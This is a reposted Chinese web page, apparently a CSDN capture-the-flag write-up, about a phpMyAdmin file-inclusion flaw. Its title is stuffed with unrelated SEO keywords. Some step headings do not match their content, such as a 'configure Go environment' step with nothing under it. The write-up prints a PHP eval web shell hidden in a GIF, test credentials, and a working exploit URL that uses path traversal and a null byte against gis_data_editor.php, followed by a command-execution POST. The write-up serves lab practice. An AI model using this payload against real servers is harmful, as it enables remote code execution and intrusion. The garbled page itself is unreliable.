当前位置: 首页> 汽车> 行情 > 建筑起名字最大气_镇江丹徒疫情_seo点击_seo sem优化

建筑起名字最大气_镇江丹徒疫情_seo点击_seo sem优化

时间:2025/7/11 15:06:07来源:https://blog.csdn.net/qq_62717550/article/details/145756985 浏览次数: 0次
建筑起名字最大气_镇江丹徒疫情_seo点击_seo sem优化

目录

漏洞描述

1.攻击机配置go环境:

2.点击“数据库”抓包token值

3.拿到flag:


漏洞描述

        phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码,包含根目录下1.gif,其内容为:<?php@eval($_POST[a]);?>。

1.攻击机配置go环境

登陆页面 /pma/gis_data_editor.php
用户名密码登陆pmatest/pmatest

2.点击“数据库”抓包token值

3.拿到flag

http://193.168.0.45:26133/pma/gis_data_editor.php?token=9f2b0206507afb8de01d4197bfa90a37&&gis_data[gis_type]=/../../../../1.gif%00

a=phpinfo();

关键字:建筑起名字最大气_镇江丹徒疫情_seo点击_seo sem优化

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: